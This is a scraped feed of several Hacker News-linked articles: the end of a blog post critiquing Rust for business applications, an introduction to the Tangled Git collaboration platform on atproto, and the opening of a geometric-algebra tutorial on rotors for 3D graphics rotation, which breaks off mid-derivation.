The best part is that - unlike e.g. Pony - the Rust compiler doesn't guarantee the absence of deadlocks in your code. Even better: since locks are so widespread, deadlocks are even more likely to occur. One doesn't even have to happen because you're using locks wrong; it can happen just because you didn't know that the code you're calling uses them somewhere below (sending changes over a tokio::watch channel is itself a great example of that).

Actors

One of the stunning issues I've found in Rust is that, given how well borrow-checker ownership matches the actor model, the actor libraries in Rust are lacking. I'm not talking about all of them, since I had neither the time nor the energy to check out every one of the 47 actor libraries listed for a good start, but that number strongly suggests a syndrome where, after the first few, every new attempt tries to solve some issues with an existing implementation, creating new ones in the process. If you're using an actor library for your business app, most likely it will be one of the 3 most popular, and most likely it will be actix, because you've been baited by its popularity and the pretty mature web framework attached to it.

The problem with Actix is that its core was defined before the era of async/await Rust. This means that it doesn't natively support async actor methods - and if you need a server app doing any kind of I/O, you WILL have to use async Rust eventually. Some support for async was eventually added, but now you need to educate yourself on which of the 4 different response types that support futures should be used in which situation. AFAIK none of these support using the &mut self actor in an async method (and we don't count actix_async_handler, since it has a list of limitations longer than its actual documentation). It's about as handy as a knife with 4 different blades but no handle.

In practice, the most popular pattern I've seen was simply using a tokio channel combined with tokio::spawn, which essentially is a retarded cousin of an actor: more verbose and missing all of its benefits like structured message handling, lifecycle management, state encapsulation, parent-children hierarchies etc.
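
For illustration, here's roughly what that channel-plus-spawn pattern looks like (the Msg enum and spawn_counter are made-up names): a hand-rolled loop owning its state, with none of the lifecycle or supervision features a real actor framework would give you.

use tokio::sync::{mpsc, oneshot};

enum Msg {
    Increment,
    Get(oneshot::Sender<u64>),
}

fn spawn_counter() -> mpsc::Sender<Msg> {
    let (tx, mut rx) = mpsc::channel(32);
    tokio::spawn(async move {
        // The task exclusively owns its state, like an actor would.
        let mut count: u64 = 0;
        while let Some(msg) = rx.recv().await {
            match msg {
                Msg::Increment => count += 1,
                Msg::Get(reply) => { let _ = reply.send(count); }
            }
        }
    });
    tx
}

#[tokio::main]
async fn main() {
    let counter = spawn_counter();
    counter.send(Msg::Increment).await.unwrap();
    let (tx, rx) = oneshot::channel();
    counter.send(Msg::Get(tx)).await.unwrap();
    assert_eq!(rx.await.unwrap(), 1);
}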

Panics

While Rust errors are pretty safe - thanks to being part of the method declaration - they are not alone: panics are still there. And unlike errors, you'll never be 100% sure that you've avoided all of them. Technically you could use some way to signal their existence, e.g. by using unsafe brackets or something, but in practice it's hard to be sure.

One of the issues is the ever-present .unwrap() calls. Technically they are meant to be used with caution, but if you're glossing over the code base, the only difference between hash_map.get().unwrap() (which can blow up often) and path_buf.to_str().unwrap() (which will most likely never blow up in your app) is your experience.
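
A minimal illustration of the difference between the panicking and the explicit version of the same lookup:

use std::collections::HashMap;

fn main() {
    let map: HashMap<&str, u32> = HashMap::new();

    // Compiles happily and panics at runtime the moment the key is
    // missing - nothing in the signature warns you:
    // let n = *map.get("missing").unwrap();

    // The same lookup with the failure handled explicitly:
    let n = map.get("missing").copied().unwrap_or(0);
    assert_eq!(n, 0);
}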

Other issues include:

  • Panics on index accesses.
  • Panics on double borrow/borrow_mut from RefCells - patterns which are perfectly fine in many languages, but in Rust will crash your entire app because the borrow checker doesn't like second guesses.
  • Panics with stack overflows, because the state machines generated by your async methods may be a "bit" bigger than expected: but at least no code has been heap-alloc'ed while solving this problem.

What's important to notice here: we're talking about panics that will crash your server, affecting not only the current request handler but everyone using your services. That's the major difference between Rust failures and the exceptions used in managed languages. And sure, you could say that these can be fixed with proper programmer discipline, but isn't the Rust promise of the compiler taking care of dangerous coding mistakes the reason why we put in the effort to learn it and deal with all of the borrow-checker bullshit along the way?

Death by a thousand cuts

Individually, the issues above can often be solved easily with some experience, and cast off as a "skill issue". But together they build up into a developer's mental fatigue: you're here to solve business problems, yet at every step you need to solve "plumbing issues" and make decisions about the memory model, including the possible feature changes and refactoring they'll require in the future. Each one of them is considered crucial by the borrow checker, to the point where it either causes a compilation error or a runtime panic.

There are places where fine-grained control over program memory and performance tuning is beneficial and can be one of the business goals: these are things from the broad area of systems engineering. However, for your daily ERP app, the complexity coming from trying to reflect real-life interactions, with all their exceptions and imprecisions, is enough: you're not going to be praised because your asset management app takes 10% less CPU while the task backlog has doubled in the meantime.

So if you're a founder or developer wondering whether you should use Rust for your next business project because some crypto start-up is developing their quasi-bank in it and it would look nice in your resume, please think twice and don't make a regrettable decision for yourself and your colleagues.

]]>
https://www.bartoszsypytkowski.com/is-rust-a-good-fit-for-business-apps/ hacker-news-small-sites-43234568 Sun, 02 Mar 2025 20:16:53 GMT
<![CDATA[Show HN: Tangled – Git collaboration platform built on atproto]]> thread link) | @icy
March 2, 2025 | https://blog.tangled.sh/intro | archive.org

Tangled is a new social-enabled Git collaboration platform, built on top of the AT Protocol. We envision a place where developers have complete ownership of their code, open source communities can freely self-govern and most importantly, coding can be social and fun again.

There are several models for decentralized code collaboration platforms, ranging from ActivityPub’s (Forgejo) federated model, to Radicle’s entirely P2P model. Our approach attempts to be the best of both worlds by adopting atproto—a protocol for building decentralized social applications with a central identity.

tangled architecture

Our approach to this is the idea of “knots”. Knots are lightweight, headless servers that enable users to host Git repositories with ease. Knots are designed for either single or multi-tenant use which is perfect for self-hosting on a Raspberry Pi at home, or larger “community” servers. By default, Tangled provides managed knots where you can host your repositories for free.

The App View at tangled.sh acts as a consolidated “view” into the whole network, allowing users to access, clone and contribute to repositories hosted across different knots—completely seamlessly.

Tangled is still in its infancy, and we’re building out several of its core features as we dogfood it ourselves. We developed these three tenets to guide our decisions:

  1. Ownership of data
  2. Low barrier to entry
  3. No compromise on user-experience

Collaborating on code isn’t easy, and the tools and workflows we use should feel natural and stay out of the way. Tangled’s architecture enables common workflows to work as you’d expect, all while remaining decentralized.

We believe that atproto has greatly simplified one of the hardest parts of social media: having your friends on it. Today, we’re rolling out invite-only access to Tangled—join us on IRC at #tangled on libera.chat and we’ll get you set up.

]]>
https://blog.tangled.sh/intro hacker-news-small-sites-43234544 Sun, 02 Mar 2025 20:14:15 GMT
<![CDATA[Rotors: A practical introduction for 3D graphics (2023)]]> thread link) | @bladeee
March 2, 2025 | https://jacquesheunis.com/post/rotors/ | archive.org

When putting 3D graphics on a screen, we need a way to express rotations of the geometry we’re rendering. To avoid the problems that come with storing rotations as axes & angles, we could use quaternions. However quaternions require that we think in 4 distinct spatial dimensions, something humans are notoriously bad at. Thankfully there is an alternative that some argue is far more elegant and simpler to understand: Rotors.

Rotors come from an area of mathematics called geometric algebra. Over the past few years I’ve seen a steady increase in the number of people claiming we should bin quaternions entirely in 3D graphics and replace them with rotors. I know nothing about either so I figured I’d try out rotors. I struggled to find educational materials online that clicked well with how I think about these things though, so this post is my own explanation of rotors and the surrounding mathematical concepts. It’s written with the specific intention of implementing rotation for 3D graphics and is intended to be used partly as an educational text and partly as a reference page.

There are two sections: The first half is purely theoretical, where we’ll look at where rotors “come from”, investigate how they behave and see how we can use them to perform rotations. The second half will cover practical applications and includes example code for use-cases you’re likely to encounter in 3D graphics.

A word on notation

\(\global\def\v#1{\mathbf{#1}}\)

In this post we will write vectors, bivectors and trivectors in bold and lower-case (e.g \(\v{v}\) is a vector). Rotors will be written in bold and upper-case (e.g \(\v{R}\) is a rotor).

The basis elements of our 3D space are denoted \(\v{e_1, e_2, e_3}\), so for example \(\v{v} = v_1\v{e_1} + v_2\v{e_2} + v_3\v{e_3}\).

Where multiplication tables are given, the first argument is the entry on the far left column of the table and the second argument is the entry on the top row of the table.

Since this post is primarily concerned with 3D graphics & simulation, we will restrict our examples to 3 dimensions of space. Rotors (unlike quaternions) can easily be extended to higher dimensions but this is left as an exercise for the reader.

Introducing: The wedge product

We begin our journey by defining a new way to combine two vectors: the so-called “wedge product”, written as \(\v{a \wedge b}\). We define the wedge product of two vectors as an associative product that distributes over addition and which is zero when both arguments are the same:

\[\begin{equation} \v{v \wedge v} = 0 \tag{ 1 } \end{equation} \]

From this we can show that the wedge product is also anticommutative:

\(\v{(a \wedge b) = -(b \wedge a)}\)

Given vectors \(\v{a}\) and \(\v{b}\): \[ \begin{aligned} (\v{a + b}) \wedge (\v{a + b}) &= 0 \\ (\v{a \wedge a}) + (\v{a \wedge b}) + (\v{b \wedge a}) + (\v{b \wedge b}) &= 0 \\ 0 + (\v{a \wedge b}) + (\v{b \wedge a}) + 0 &= 0 \\ (\v{a \wedge b}) &= -(\v{b \wedge a}) \end{aligned} \]

We have yet to specify how to actually “compute” a wedge product though. We know that it produces zero when both arguments are equivalent but what if they aren’t? In this case we “compute” the wedge product by expressing the arguments in terms of its basis elements and multiplying out.

When it comes down to a pair of basis vectors we just leave them be. So for example we don’t simplify \(\v{e_1} \wedge \v{e_2}\) any further. This is because \(\v{e_1} \wedge \v{e_2}\) is not a vector. It’s a new kind of entity called a bivector. If you think of an ordinary vector as a point (offset from the origin), then the bivector produced by applying the wedge product to two such vectors can be visualised as the infinite plane containing the origin and those two points. Equivalently, you can think of a bivector as the direction that is normal to the plane formed by the two vectors that we wedged together. The bivector \(\v{e_1 \wedge e_2}\) is in some sense the normal going in the same direction as the vector \(\v{e_3}\).

In the same way that we have basis vectors (\(\v{e_1}, \v{e_2}, \v{e_3})\), we also have basis bivectors: \(\v{e_{12}}, \v{e_{23}}, \v{e_{31}}\). Conveniently, these bivector basis elements are simple wedge products of the vector basis elements: \[ \v{e_{12}} = \v{e_1} \wedge \v{e_2} \\ \v{e_{23}} = \v{e_2} \wedge \v{e_3} \\ \v{e_{31}} = \v{e_3} \wedge \v{e_1} \]

Note that (as with vectors) we’re not restricted to a specific set of basis bivectors. Some texts prefer to use \(\v{e_{12}}, \v{e_{13}}, \v{e_{23}}\). The calculations work out a little differently but the logic is the same. For this post we’ll use \(\v{e_{12}}, \v{e_{23}}, \v{e_{31}}\) throughout. An important thing to note is that the 3-dimensional case is a little misleading here. It is very easy to confuse vectors with bivectors because they have the same number of basis elements. This is not true in higher dimensions. In 4-dimensional space, for example, there are 4 basis vectors but 6 basis bivectors so we should always explicitly state what basis elements we’re using in our calculations.

One last realisation is that in 3D we can go one step further. On top of vectors (representing lines) and bivectors (representing planes), we also have trivectors, which represent volumes. Trivectors are as far as we can go in 3D though because the space itself is 3-dimensional, there’s no room for more dimensions! Trivectors in 3D are sometimes referred to as “pseudoscalars” since they have only 1 basis element: \(\v{e_{123}}\). Trivectors in 3D are oriented (in the sense that the coefficient of the trivector basis element can be negative) but otherwise contain no positional information.

Below is a multiplication table for the wedge product of our 3D basis vectors:

\[\begin{array}{c|c:c:c} \wedge & \v{e_1} & \v{e_2} & \v{e_3} \\ \hline \v{e_1} & 0 & \v{e_{12}} & -\v{e_{31}} \\ \v{e_2} & -\v{e_{12}} & 0 & \v{e_{23}} \\ \v{e_3} & \v{e_{31}} & -\v{e_{23}} & 0 \\ \end{array}\]

Wedge product of non-basis vectors

Let us see what happens if we wedge together two arbitrary 3D vectors in the above manner:

\(\v{v \wedge u} = (v_1u_2 - v_2u_1)\v{e_{12}} + (v_2u_3 - v_3u_2)\v{e_{23}} + (v_3u_1 - v_1u_3)\v{e_{31}}\)

Given vectors \(\v{v} = v_1\v{e_1} + v_2\v{e_2} + v_3\v{e_3}\) and \(\v{u} = u_1\v{e_1} + u_2\v{e_2} + u_3\v{e_3}\):

\[ \begin{align*} \v{v \wedge u} &= (v_1\v{e_1} + v_2\v{e_2} + v_3\v{e_3}) \wedge (u_1\v{e_1} + u_2\v{e_2} + u_3\v{e_3}) \\ \v{v \wedge u} &= (v_1\v{e_1} \wedge u_1\v{e_1}) + (v_1\v{e_1} \wedge u_2\v{e_2}) + (v_1\v{e_1} \wedge u_3\v{e_3}) \tag{distribute over +}\\ &+ (v_2\v{e_2} \wedge u_1\v{e_1}) + (v_2\v{e_2} \wedge u_2\v{e_2}) + (v_2\v{e_2} \wedge u_3\v{e_3}) \\ &+ (v_3\v{e_3} \wedge u_1\v{e_1}) + (v_3\v{e_3} \wedge u_2\v{e_2}) + (v_3\v{e_3} \wedge u_3\v{e_3}) \\ \v{v \wedge u} &= v_1u_1(\v{e_1 \wedge e_1}) + v_1u_2(\v{e_1 \wedge e_2}) + v_1u_3(\v{e_1 \wedge e_3}) \tag{pull out coefficients}\\ &+ v_2u_1(\v{e_2 \wedge e_1}) + v_2u_2(\v{e_2 \wedge e_2}) + v_2u_3(\v{e_2 \wedge e_3}) \\ &+ v_3u_1(\v{e_3 \wedge e_1}) + v_3u_2(\v{e_3 \wedge e_2}) + v_3u_3(\v{e_3 \wedge e_3}) \\ \v{v \wedge u} &= 0 + v_1u_2\v{e_{12}} - v_1u_3\v{e_{31}} \\ &- v_2u_1\v{e_{12}} + 0 + v_2u_3\v{e_{23}} \\ &+ v_3u_1\v{e_{31}} - v_3u_2\v{e_{23}} + 0 \\ \v{v \wedge u} &= (v_1u_2 - v_2u_1)\v{e_{12}} + (v_2u_3 - v_3u_2)\v{e_{23}} + (v_3u_1 - v_1u_3)\v{e_{31}} \\ \end{align*} \]

Well now, those coefficients look awfully familiar don’t they? They’re exactly the coefficients of the usual 3D cross-product.1 This lines up with our earlier claim that bivectors function as normals: If you look at which coefficients go with which bivector basis elements, you’ll see that the coefficient for \(\v{e_{23}}\) is the same as the coefficient of \(\v{x}\) in the usual 3D cross-product.

By virtue of “sharing” the equation for 3D vector cross product, we can conclude that the magnitude of the bivector \(\v{v \wedge u}\) is equal to the area of the parallelogram formed by \(\v{v}\) and \(\v{u}\). A neat geometric proof of this (with diagrams) can be found on the mathematics Stack Exchange. The sign of the area indicates the winding order of the parallelogram, although which direction is positive and which is negative will depend on the handedness of your coordinate system.
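
To make the correspondence concrete, here is a small code sketch of this formula; the Vec3 and Bivector types are illustrative (written in Rust purely for familiarity), not from the article's own codebase:

#[derive(Debug, Clone, Copy, PartialEq)]
struct Vec3 { x: f32, y: f32, z: f32 }

// Coefficients on the basis bivectors e12, e23, e31.
#[derive(Debug, Clone, Copy, PartialEq)]
struct Bivector { e12: f32, e23: f32, e31: f32 }

fn wedge(v: Vec3, u: Vec3) -> Bivector {
    Bivector {
        e12: v.x * u.y - v.y * u.x,
        e23: v.y * u.z - v.z * u.y,
        e31: v.z * u.x - v.x * u.z,
    }
}

fn main() {
    // e1 ^ e2 = e12, matching the multiplication table above.
    let b = wedge(Vec3 { x: 1.0, y: 0.0, z: 0.0 },
                  Vec3 { x: 0.0, y: 1.0, z: 0.0 });
    assert_eq!(b, Bivector { e12: 1.0, e23: 0.0, e31: 0.0 });
}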

Like vectors, bivectors can be written as the sum of some basis elements each multiplied by some scalar. It may not come as a surprise then that as with vectors, adding two bivectors together is simply a matter of adding each of the constituent components.

So we have vector addition and bivector addition. Can we add a vector to a bivector? Yes, but we leave them as separate terms. In the same way that we don’t try to “simplify” \(\v{e_1 + e_2}\), we also don’t try to simplify \(\v{e_1 + e_{12}}\). We just leave them as the sum of these two different entities. The resulting object is neither a vector nor a bivector, but is a more general object called a “multivector”. A multivector is just a sum of scalars, vectors, bivectors, trivectors etc. All scalars, vectors, bivectors etc are also multivectors, except that they only have non-zero coefficients on one “type” of basis element. So for example you could write the vector \(\v{e_1}\) as the multivector \(\v{e_1} + 0\v{e_{12}}\).

Multivectors are particularly relevant to the discussion of our second new operation and the protagonist of this post:

Geometric product

The geometric product is defined for arbitrary multivectors, is associative, and distributes over addition. Somewhat annoyingly (in an environment involving several types of products), it is denoted with no symbol, as just \(\v{ab}\). If we have two vectors \(\v{a}\) and \(\v{b}\), we can calculate their geometric product as:

\[\begin{equation} \v{ab = (a \cdot b) + (a \wedge b)} \tag{ 2 } \end{equation} \]

Where \(\cdot\) is the usual dot product we know from traditional linear algebra. Note that if both inputs are the same then by equation 1 we get:

\[\begin{equation} \v{aa} = \v{a \cdot a} \tag{ 3 } \end{equation} \]

This, and the fact that our basis vectors are all unit-length and perpendicular to one another leads us to: \(\v{e_ie_i} = \v{e_i} \cdot \v{e_i} = 1\) and \(\v{e_ie_j} = 0 + \v{e_i} \wedge \v{e_j} = -\v{e_je_i} ~~~\forall i \neq j\).

In particular this means that \(\v{e_1e_2} = \v{e_1 \wedge e_2} = \v{e_{12}}\) (and similarly for the other basis bivectors). Indeed basis bivectors being the wedge product of basis vectors is now revealed to be a special case of being the geometric product of basis vectors. This leads us to an analogous definition for trivectors: \(\v{e_{123}} = \v{e_1e_2e_3}\).

At this point we can compute a complete multiplication table for the geometric product with basis elements in 3D:

\[\begin{array}{c|c:c:c:c:c:c:c:c} \cdot\wedge & \v{e_1} & \v{e_2} & \v{e_3} & \v{e_{12}} & \v{e_{31}} & \v{e_{23}} & \v{e_{123}} \\ \hline \v{e_1} & 1 & \v{e_{12}} & -\v{e_{31}} & \v{e_2} & -\v{e_3} & \v{e_{123}} & \v{e_{23}} \\ \v{e_2} & -\v{e_{12}} & 1 & \v{e_{23}} & -\v{e_1} & \v{e_{123}} & \v{e_3} & \v{e_{31}} \\ \v{e_3} & \v{e_{31}} & -\v{e_{23}} & 1 & \v{e_{123}} & \v{e_1} & -\v{e_2} & \v{e_{12}} \\ \v{e_{12}} & -\v{e_2} & \v{e_1} & \v{e_{123}} & -1 & \v{e_{23}} & -\v{e_{31}} & -\v{e_3} \\ \v{e_{31}} & \v{e_3} & \v{e_{123}} & -\v{e_1} & -\v{e_{23}} & -1 & \v{e_{12}} & -\v{e_2} \\ \v{e_{23}} & \v{e_{123}} & -\v{e_3} & \v{e_2} & \v{e_{31}} & -\v{e_{12}} & -1 & -\v{e_1} \\ \v{e_{123}} & \v{e_{23}} & \v{e_{31}} & \v{e_{12}} & -\v{e_3} & -\v{e_2} & -\v{e_1} & -1 \\ \end{array}\]

Some multiplication table entries derived In case it's not clear how we can arrive at some of the values in the table above, here are some worked examples: \[ \v{e_1e_3} = \v{e_1 \wedge e_3} = -(\v{e_3 \wedge e_1}) = -\v{e_{31}} \\ \v{e_1e_{12}} = \v{e_1(e_1e_2)} = \v{(e_1e_1)e_2} = 1\v{e_2} = \v{e_2} \\ \v{e_3e_{12}} = \v{e_3e_1e_2} = -\v{e_1e_3e_2} = \v{e_1e_2e_3} = \v{e_{123}} \\ \v{e_{12}e_{12}} = (\v{e_1e_2})(\v{e_1e_2}) = (-\v{e_2e_1})(\v{e_1e_2}) = -\v{e_2}(\v{e_1e_1})\v{e_2} = -\v{e_2e_2} = -1 \\ \v{e_{123}e_{2}} = \v{(e_1e_2e_3)e_2} = -(\v{e_1e_3e_2})\v{e_2} = -\v{e_1e_3}(\v{e_2e_2}) = -\v{e_1e_3} = \v{e_3e_1} = \v{e_{31}}\\ \]

To compute the geometric product of two arbitrary multivectors, we can break the arguments down into their constituent basis elements and manipulate only those (using the multiplication table above). We need to do this because equations 2 and 3 above apply only to vectors, and do not apply to bivectors (or trivectors etc).
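
As a small illustration of equation 2 (a sketch of mine, reusing the hypothetical multivector3 struct above and a vec3 type like the one in the practical section below), the geometric product of two vectors fills in only the scalar and bivector coefficients:

// Geometric product of two vectors (equation 2): ab = (a . b) + (a ^ b)
multivector3 geometric_product(vec3 a, vec3 b)
{
    multivector3 result = {};
    result.scalar = (a.x * b.x) + (a.y * b.y) + (a.z * b.z); // a . b
    result.xy = (a.x * b.y) - (a.y * b.x); // e12 coefficient of a ^ b
    result.yz = (a.y * b.z) - (a.z * b.y); // e23 coefficient of a ^ b
    result.zx = (a.z * b.x) - (a.x * b.z); // e31 coefficient of a ^ b
    return result;
}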

Inverses under the geometric product

Under the geometric product all non-zero vectors \(\v{v}\) have an inverse:

\[\begin{equation} \v{v}^{-1} = \frac{\v{v}}{|\v{v}|^2} \tag{ 4 } \end{equation} \]

Proof: \(\v{v}^{-1} = \frac{\v{v}}{|\v{v}|^2}\) Given a vector \(\v{v} \neq 0\) let's take \(\v{v^\prime} = \frac{\v{v}}{|\v{v}|^2}\), then: \[\begin{aligned} \v{vv^\prime} &= \v{v \cdot v^\prime + v \wedge v^\prime} \\ \v{vv^\prime} &= \frac{1}{|\v{v}|^2}(\v{v \cdot v}) + \frac{1}{|\v{v}|^2}(\v{v \wedge v}) \\ \v{vv^\prime} &= \frac{1}{|\v{v}|^2}|\v{v}|^2 + \frac{1}{|\v{v}|^2}0 \\ \v{vv^\prime} &= \frac{|\v{v}|^2}{|\v{v}|^2} \\ \v{vv^\prime} &= 1 \\ \end{aligned}\] and similarly if we multiply on the left side: \[\begin{aligned} \v{v^\prime v} &= \v{v^\prime \cdot v + v^\prime \wedge v} \\ \v{v^\prime v} &= \frac{1}{|\v{v}|^2}(\v{v \cdot v}) + \frac{1}{|\v{v}|^2}(\v{v \wedge v}) \\ \v{v^\prime v} &= \frac{1}{|\v{v}|^2}|\v{v}|^2 + \frac{1}{|\v{v}|^2}0 \\ \v{v^\prime v} &= \frac{|\v{v}|^2}{|\v{v}|^2} \\ \v{v^\prime v} &= 1 \\ \end{aligned}\] So \(\v{v^\prime} = \frac{\v{v}}{|\v{v}|^2} = \v{v^{-1}}\), the inverse of \(\v{v}\).
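
In code this is a one-liner; a sketch assuming a vec3 type with a scalar division operator:

// Inverse of a non-zero vector under the geometric product (equation 4)
vec3 geometric_inverse(vec3 v)
{
    return v / dot(v, v); // v / |v|^2; assumes v is not the zero vector
}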

Similarly, the geometric product of two vectors \(\v{a}\) and \(\v{b}\) also has an inverse:

\[\begin{equation} (\v{ab})^{-1} = \v{b}^{-1}\v{a}^{-1} \tag{ 5 } \end{equation} \]

Proof: \((\v{ab})^{-1} = \v{b}^{-1}\v{a}^{-1}\) Given any two vectors \(\v{a}\) and \(\v{b}\) then we can multiply on the right: \[ (\v{ab})(\v{b}^{-1}\v{a}^{-1}) = \v{a}(\v{bb}^{-1})\v{a}^{-1} = \v{a}(1)\v{a}^{-1} = \v{aa}^{-1} = 1 \] and on the left: \[ (\v{b}^{-1}\v{a}^{-1})(\v{ab}) = \v{b}^{-1}(\v{a}^{-1}\v{a})\v{b} = \v{b}^{-1}(1)\v{b} = \v{b}^{-1}\v{b} = 1 \] and conclude that \(\v{b}^{-1}\v{a}^{-1} = (\v{ab})^{-1}\), the (left and right) inverse of \(\v{ab}\).

Since every vector has an inverse, for any two vectors \(\v{a}\) and \(\v{b}\) we can write: \[\begin{aligned} \v{a} &= \v{a} \\ \v{a} &= \v{abb}^{-1} \\ \v{a} &= \frac{1}{|\v{b}|^2} \v{(ab)b} \\ \v{a} &= \frac{1}{|\v{b}|^2} \v{(a \cdot b + a \wedge b) b} \\ \v{a} &= \frac{\v{a \cdot b}}{|\v{b}|^2} \v{b} + \frac{\v{a \wedge b}}{|\v{b}|^2} \v{b} \\ \end{aligned}\]

From this we conclude that for two arbitrary (non-zero) vectors \(\v{a}\) and \(\v{b}\), we can write one in terms of components parallel and perpendicular to the other:

\[\begin{equation} \v{a} = \v{a}_{\parallel b} + \v{a}_{\perp b} \tag{ 6 } \end{equation} \]

Where \(\v{a_{\parallel b}}\) is the component of \(\v{a}\) parallel to \(\v{b}\) (the projection of \(\v{a}\) onto \(\v{b}\)) and \(\v{a_{\perp b}}\) is the component of \(\v{a}\) perpendicular to \(\v{b}\) (the rejection of \(\v{a}\) from \(\v{b}\)). We know from linear algebra that

\[\begin{equation} \v{a_{\parallel b}} = \frac{\v{a \cdot b}}{|\v{b}|^2}\v{b} \tag{ 7 } \end{equation} \]

Substituting into the calculation above we get \(\v{a} = \v{a_{\parallel b}} + \frac{\v{a \wedge b}}{|\v{b}|^2} \v{b} \) from which we conclude that

\[\begin{equation} \v{a_{\perp b}} = \frac{\v{a \wedge b}}{|\v{b}|^2}\v{b} \tag{ 8 } \end{equation} \]
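
Equations 7 and 8 translate into a short sketch (function names mine, assuming the usual vec3 arithmetic operators); here the rejection is computed as \(\v{a} - \v{a_{\parallel b}}\), which by equation 6 equals the bivector-times-vector product in equation 8:

// Component of a parallel to b: the projection of a onto b (equation 7)
vec3 project(vec3 a, vec3 b)
{
    return b * (dot(a, b) / dot(b, b));
}

// Component of a perpendicular to b: the rejection of a from b (equation 8)
vec3 reject(vec3 a, vec3 b)
{
    return a - project(a, b);
}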

Reflections with the geometric product

Recall from linear algebra that given two non-zero vectors \(\v{v}\) and \(\v{a}\), we can write the reflection of \(\v{v}\) over \(\v{a}\) as:

\[ \v{v^\prime} = \v{v} - 2\v{v_{\perp a}} = \v{v}_{\parallel a} - \v{v}_{\perp a} \]

If we substitute equations 7 and 8 (with \(\v{v}\) here playing the role of \(\v{a}\) in those equations, and \(\v{a}\) playing the role of \(\v{b}\)) we get:

\[\begin{aligned} \v{v^\prime} &= \v{v}_{\parallel a} - \v{v}_{\perp a} \\ &= \frac{\v{v \cdot a}}{|\v{a}|^2} \v{a} - \frac{\v{v \wedge a}}{|\v{a}|^2} \v{a} \\ &= (\v{v \cdot a})\frac{\v{a}}{|\v{a}|^2} - (\v{v \wedge a})\frac{\v{a}}{|\v{a}|^2} \\ &= \v{(v \cdot a)a}^{-1} - (\v{v \wedge a})\v{a}^{-1} \\ &= \v{(a \cdot v)a}^{-1} + (\v{a \wedge v})\v{a}^{-1} \\ &= (\v{a \cdot v + a \wedge v})\v{a}^{-1} \\ &= \v{(av)a}^{-1} \\ \v{v^\prime} &= \v{ava}^{-1} \\ \end{aligned}\]

So we can reflect vectors using only the geometric product. \(\v{ava}^{-1}\) is a form we will see quite often, and is sometimes referred to as a “sandwich product”.

The first and last lines of the calculation above together demonstrate an important property: Since \(\v{ava}^{-1} = \v{v}_{\parallel a} - \v{v}_{\perp a}\), we know that \(\v{ava}^{-1}\) is just a vector and contains no scalar, bivector (or trivector etc) components. This means we can use the output of such a sandwich product as the input to another sandwich product, which we will do shortly.

For our own convenience, we can also produce an equation for the output of such a sandwich product:

Equation for 3D sandwich product

\[\begin{align*} & \v{ava}^{-1} \\ =~& (\v{av})\v{a}^{-1} \\ =~& |a|^{-2} (\v{av})\v{a} \\ =~& |a|^{-2} (\v{(a \cdot v) + (a \wedge v)})\v{a} \\ =~& |a|^{-2} \lbrack \\ & (a_1v_1 + a_2v_2 + a_3v_3) \\ & + (a_1v_2 - a_2v_1)\v{e_{12}} \\ & + (a_2v_3 - a_3v_2)\v{e_{23}} \\ & + (a_3v_1 - a_1v_3)\v{e_{31}} \\ & \rbrack (a_1 \v{e_1} + a_2 \v{e_2} + a_3 \v{e_3}) \\ =~& |a|^{-2} \lbrack \\ & (a_1v_1 + a_2v_2 + a_3v_3)(a_1 \v{e_1} + a_2 \v{e_2} + a_3 \v{e_3}) \\ & + (a_1v_2 - a_2v_1)\v{e_{12}}(a_1 \v{e_1} + a_2 \v{e_2} + a_3 \v{e_3}) \\ & + (a_2v_3 - a_3v_2)\v{e_{23}}(a_1 \v{e_1} + a_2 \v{e_2} + a_3 \v{e_3}) \\ & + (a_3v_1 - a_1v_3)\v{e_{31}}(a_1 \v{e_1} + a_2 \v{e_2} + a_3 \v{e_3}) \\ \rbrack \\ =~& |a|^{-2} \lbrack \tag{multiply out the brackets on the right} \\ & (a_1v_1 + a_2v_2 + a_3v_3)a_1\v{e_1} + (a_1v_1 + a_2v_2 + a_3v_3)a_2\v{e_2} + (a_1v_1 + a_2v_2 + a_3v_3)a_3\v{e_3} \\ & + (a_1v_2 - a_2v_1)a_1\v{e_{12}}\v{e_1} + (a_1v_2 - a_2v_1)a_2\v{e_{12}}\v{e_2} + (a_1v_2 - a_2v_1)a_3\v{e_{12}}\v{e_3} \\ & + (a_2v_3 - a_3v_2)a_1\v{e_{23}}\v{e_1} + (a_2v_3 - a_3v_2)a_2\v{e_{23}}\v{e_2} + (a_2v_3 - a_3v_2)a_3\v{e_{23}}\v{e_3} \\ & + (a_3v_1 - a_1v_3)a_1\v{e_{31}}\v{e_1} + (a_3v_1 - a_1v_3)a_2\v{e_{31}}\v{e_2} + (a_3v_1 - a_1v_3)a_3\v{e_{31}}\v{e_3} \\ \rbrack \\ =~& |a|^{-2} \lbrack \tag{simplify the basis element products} \\ & (a_1v_1 + a_2v_2 + a_3v_3)a_1\v{e_1} + (a_1v_1 + a_2v_2 + a_3v_3)a_2\v{e_2} + (a_1v_1 + a_2v_2 + a_3v_3)a_3\v{e_3} \\ & - (a_1v_2 - a_2v_1)a_1\v{e_2} + (a_1v_2 - a_2v_1)a_2\v{e_1} + (a_1v_2 - a_2v_1)a_3\v{e_{123}} \\ & + (a_2v_3 - a_3v_2)a_1\v{e_{123}} - (a_2v_3 - a_3v_2)a_2\v{e_3} + (a_2v_3 - a_3v_2)a_3\v{e_2} \\ & + (a_3v_1 - a_1v_3)a_1\v{e_3} + (a_3v_1 - a_1v_3)a_2\v{e_{123}} - (a_3v_1 - a_1v_3)a_3\v{e_1} \\ \rbrack \\ =~& |a|^{-2} \lbrack \tag{multiply out the remaining brackets} \\ & a_1a_1v_1\v{e_1} + a_1a_2v_2\v{e_1} + a_3a_1v_3\v{e_1} \\ & + a_1a_2v_1\v{e_2} + a_2a_2v_2\v{e_2} + a_2a_3v_3\v{e_2} \\ & + a_3a_1v_1\v{e_3} + a_2a_3v_2\v{e_3} + a_3a_3v_3\v{e_3} \\ & - a_1a_1v_2\v{e_2} + a_1a_2v_1\v{e_2} + a_1a_2v_2\v{e_1} - a_2a_2v_1\v{e_1} + a_3a_1v_2\v{e_{123}} - a_2a_3v_1\v{e_{123}} \\ & + a_1a_2v_3\v{e_{123}} - a_3a_1v_2\v{e_{123}} - a_2a_2v_3\v{e_3} + a_2a_3v_2\v{e_3} + a_2a_3v_3\v{e_2} - a_3a_3v_2\v{e_2} \\ & + a_3a_1v_1\v{e_3} - a_1a_1v_3\v{e_3} + a_2a_3v_1\v{e_{123}} - a_1a_2v_3\v{e_{123}} - a_3a_3v_1\v{e_1} + a_3a_1v_3\v{e_1} \\ \rbrack \\ =~& |a|^{-2} \lbrack \tag{group by basis vector} \\ & a_1a_1v_1\v{e_1} + a_1a_2v_2\v{e_1} + a_3a_1v_3\v{e_1} + 